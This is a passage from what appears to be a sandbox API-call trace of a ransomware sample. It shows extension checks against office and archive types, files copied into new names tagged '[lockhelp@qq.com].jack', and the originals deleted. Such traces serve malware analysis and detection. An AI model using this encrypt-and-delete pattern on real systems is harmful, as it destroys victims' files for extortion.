(lpString=".pdf") returned 4 [0199.320] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0199.320] lstrlenW (lpString=".xls") returned 4 [0199.320] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0199.320] lstrlenW (lpString=".xlsx") returned 5 [0199.320] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0199.320] lstrlenW (lpString=".ppt") returned 4 [0199.320] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0199.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0199.320] lstrlenW (lpString=".zip") returned 4 [0199.320] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0199.320] lstrlenW (lpString=".rar") returned 4 [0199.320] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0199.320] lstrlenW (lpString=".bz2") returned 4 [0199.320] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0199.320] lstrlenW (lpString=".7z") returned 3 [0199.320] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0199.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0199.320] lstrlenW (lpString=".dbf") returned 4 [0199.321] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0199.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0199.321] lstrlenW (lpString=".1cd") returned 4 [0199.321] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0199.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0199.321] lstrlenW (lpString=".jpg") returned 4 [0199.321] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0199.321] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0199.321] lstrlenW (lpString="insertbase.xml") returned 14 [0199.321] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0199.332] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=903) returned 1 [0199.332] CloseHandle (hObject=0x3dc) returned 1 [0199.332] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml")) returned 0x20 [0199.332] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.332] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0199.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0199.332] lstrlenW (lpString=".doc") returned 4 [0199.332] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.333] lstrlenW (lpString=".docx") returned 5 [0199.333] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0199.333] lstrlenW (lpString=".pdf") returned 4 [0199.333] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.333] lstrlenW (lpString=".xls") returned 4 [0199.333] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.333] lstrlenW (lpString=".xlsx") returned 5 [0199.333] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0199.333] lstrlenW (lpString=".ppt") returned 4 [0199.333] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.333] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0199.333] lstrlenW (lpString=".zip") returned 4 [0199.333] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.333] lstrlenW (lpString=".rar") returned 4 [0199.333] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.333] lstrlenW (lpString=".bz2") returned 4 [0199.333] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.333] lstrlenW (lpString=".7z") returned 3 [0199.333] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.333] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0199.333] lstrlenW (lpString=".dbf") returned 4 [0199.333] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.815] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.815] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.816] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0199.934] GetLastError () returned 0x0 [0199.934] ReadFile (in: hFile=0x3d4, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x374c, lpOverlapped=0x0) returned 1 [0201.339] WriteFile (in: hFile=0x3f8, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x3750, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x3750, lpOverlapped=0x0) returned 1 [0201.340] ReadFile (in: hFile=0x3d4, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.341] WriteFile (in: hFile=0x3f8, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xea, lpOverlapped=0x0) returned 1 [0201.341] SetEndOfFile (hFile=0x3f8) returned 1 [0201.341] CloseHandle (hObject=0x3f8) returned 1 [0201.342] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.342] SetEndOfFile (hFile=0x3d4) returned 1 [0201.343] CloseHandle (hObject=0x3d4) returned 1 [0201.343] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0201.344] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip")) returned 1 [0201.344] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip") returned 57 [0201.344] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip") returned 57 [0201.344] lstrlenW (lpString=".doc") returned 4 [0201.344] lstrcmpiW (lpString1=".doc", lpString2=".zip") returned -1 [0201.344] lstrlenW (lpString=".docx") returned 5 [0201.344] lstrcmpiW (lpString1=".docx", lpString2="t.zip") returned -1 [0201.344] lstrlenW (lpString=".pdf") returned 4 [0201.344] lstrcmpiW (lpString1=".pdf", lpString2=".zip") returned -1 [0201.344] lstrlenW (lpString=".xls") returned 4 [0201.344] lstrcmpiW (lpString1=".xls", lpString2=".zip") returned -1 [0201.344] lstrlenW (lpString=".xlsx") returned 5 [0201.344] lstrcmpiW (lpString1=".xlsx", lpString2="t.zip") returned -1 [0201.344] lstrlenW (lpString=".ppt") returned 4 [0201.344] lstrcmpiW (lpString1=".ppt", lpString2=".zip") returned -1 [0201.344] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip") returned 57 [0201.344] lstrlenW (lpString=".zip") returned 4 [0201.344] lstrcmpiW (lpString1=".zip", lpString2=".zip") returned 0 [0201.345] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip") returned 57 [0201.345] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip") returned 57 [0201.345] lstrlenW (lpString=".doc") returned 4 [0201.345] lstrcmpiW (lpString1=".doc", lpString2=".zip") returned -1 [0201.345] lstrlenW (lpString=".docx") returned 5 [0201.345] lstrcmpiW (lpString1=".docx", lpString2="t.zip") returned -1 [0201.345] lstrlenW (lpString=".pdf") returned 4 [0201.345] lstrcmpiW (lpString1=".pdf", lpString2=".zip") returned -1 [0201.345] lstrlenW (lpString=".xls") returned 4 [0201.345] lstrcmpiW (lpString1=".xls", lpString2=".zip") returned -1 [0201.345] lstrlenW (lpString=".xlsx") returned 5 [0201.345] lstrcmpiW (lpString1=".xlsx", lpString2="t.zip") returned -1 [0201.345] lstrlenW (lpString=".ppt") returned 4 [0201.345] lstrcmpiW (lpString1=".ppt", lpString2=".zip") returned -1 [0201.345] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip") returned 57 [0201.345] lstrlenW (lpString=".zip") returned 4 [0201.345] lstrcmpiW (lpString1=".zip", lpString2=".zip") returned 0 [0201.345] lstrcmpiW (lpString1=".gif", lpString2=".jack") returned -1 [0201.345] lstrlenW (lpString="win32_LinkDrop32x32.gif") returned 23 [0201.345] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0201.352] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=168) returned 1 [0201.352] CloseHandle (hObject=0x3f8) returned 1 [0201.352] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif")) returned 0x20 [0201.352] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0201.352] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0201.352] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.352] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.352] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0201.361] GetLastError () returned 0x0 [0201.361] ReadFile (in: hFile=0x3f8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0xa8, lpOverlapped=0x0) returned 1 [0201.362] WriteFile (in: hFile=0x3d4, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xb0, lpOverlapped=0x0) returned 1 [0201.363] ReadFile (in: hFile=0x3f8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.363] WriteFile (in: hFile=0x3d4, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x102, lpOverlapped=0x0) returned 1 [0201.363] SetEndOfFile (hFile=0x3d4) returned 1 [0201.363] CloseHandle (hObject=0x3d4) returned 1 [0201.364] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.364] SetEndOfFile (hFile=0x3f8) returned 1 [0201.365] CloseHandle (hObject=0x3f8) returned 1 [0201.365] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0201.365] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif")) returned 1 [0201.366] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0201.366] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0201.366] lstrlenW (lpString=".doc") returned 4 [0201.366] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0201.366] lstrlenW (lpString=".docx") returned 5 [0201.366] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0201.366] lstrlenW (lpString=".pdf") returned 4 [0201.366] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0201.366] lstrlenW (lpString=".xls") returned 4 [0201.366] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0201.366] lstrlenW (lpString=".xlsx") returned 5 [0201.366] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0201.366] lstrlenW (lpString=".ppt") returned 4 [0201.366] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0201.366] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0201.366] lstrlenW (lpString=".zip") returned 4 [0201.366] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0201.366] lstrlenW (lpString=".rar") returned 4 [0201.366] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0201.366] lstrlenW (lpString=".bz2") returned 4 [0201.366] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0201.366] lstrlenW (lpString=".7z") returned 3 [0201.366] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0201.366] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0201.366] lstrlenW (lpString=".dbf") returned 4 [0201.366] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0201.366] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0201.366] lstrlenW (lpString=".1cd") returned 4 [0201.366] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0201.366] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0201.366] lstrlenW (lpString=".jpg") returned 4 [0201.367] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0201.367] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0201.367] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0201.367] lstrlenW (lpString=".doc") returned 4 [0201.367] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0201.367] lstrlenW (lpString=".docx") returned 5 [0201.367] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0201.367] lstrlenW (lpString=".pdf") returned 4 [0201.367] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0201.367] lstrlenW (lpString=".xls") returned 4 [0201.367] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0201.367] lstrlenW (lpString=".xlsx") returned 5 [0201.367] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0201.367] lstrlenW (lpString=".ppt") returned 4 [0201.367] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0201.367] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0201.367] lstrlenW (lpString=".zip") returned 4 [0201.367] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0201.367] lstrlenW (lpString=".rar") returned 4 [0201.367] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0201.367] lstrlenW (lpString=".bz2") returned 4 [0201.367] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0201.367] lstrlenW (lpString=".7z") returned 3 [0201.367] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0201.367] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0201.367] lstrlenW (lpString=".dbf") returned 4 [0201.367] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0201.367] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0201.367] lstrlenW (lpString=".1cd") returned 4 [0201.368] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0201.368] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0201.368] lstrlenW (lpString=".jpg") returned 4 [0201.368] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0201.368] lstrcmpiW (lpString1=".gif", lpString2=".jack") returned -1 [0201.368] lstrlenW (lpString="win32_MoveDrop32x32.gif") returned 23 [0201.368] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0201.370] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=147) returned 1 [0201.370] CloseHandle (hObject=0x3d4) returned 1 [0201.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif")) returned 0x20 [0201.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0201.374] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0201.374] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.374] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.374] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0201.374] GetLastError () returned 0x0 [0201.374] ReadFile (in: hFile=0x420, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x93, lpOverlapped=0x0) returned 1 [0201.375] WriteFile (in: hFile=0x404, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xa0, lpOverlapped=0x0) returned 1 [0201.376] ReadFile (in: hFile=0x420, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.376] WriteFile (in: hFile=0x404, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x102, lpOverlapped=0x0) returned 1 [0201.377] SetEndOfFile (hFile=0x404) returned 1 [0201.377] CloseHandle (hObject=0x404) returned 1 [0201.377] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.378] SetEndOfFile (hFile=0x420) returned 1 [0201.378] CloseHandle (hObject=0x420) returned 1 [0201.379] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0201.379] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif")) returned 1 [0201.379] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0201.379] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0201.379] lstrlenW (lpString=".doc") returned 4 [0201.379] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0201.379] lstrlenW (lpString=".docx") returned 5 [0201.379] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0201.379] lstrlenW (lpString=".pdf") returned 4 [0201.379] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0201.379] lstrlenW (lpString=".xls") returned 4 [0201.379] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0201.379] lstrlenW (lpString=".xlsx") returned 5 [0201.379] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0201.380] lstrlenW (lpString=".ppt") returned 4 [0201.380] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0201.380] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0201.380] lstrlenW (lpString=".zip") returned 4 [0201.380] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0201.380] lstrlenW (lpString=".rar") returned 4 [0201.380] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0201.380] lstrlenW (lpString=".bz2") returned 4 [0201.380] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0201.380] lstrlenW (lpString=".7z") returned 3 [0201.380] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0201.380] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0201.380] lstrlenW (lpString=".dbf") returned 4 [0201.380] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0201.380] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0201.380] lstrlenW (lpString=".1cd") returned 4 [0201.380] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0201.380] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0201.380] lstrlenW (lpString=".jpg") returned 4 [0201.380] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0201.380] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0201.380] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0201.380] lstrlenW (lpString=".doc") returned 4 [0201.380] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0201.380] lstrlenW (lpString=".docx") returned 5 [0201.380] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0201.380] lstrlenW (lpString=".pdf") returned 4 [0201.380] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0201.381] lstrlenW (lpString=".xls") returned 4 [0201.381] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0201.381] lstrlenW (lpString=".xlsx") returned 5 [0201.381] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0201.381] lstrlenW (lpString=".ppt") 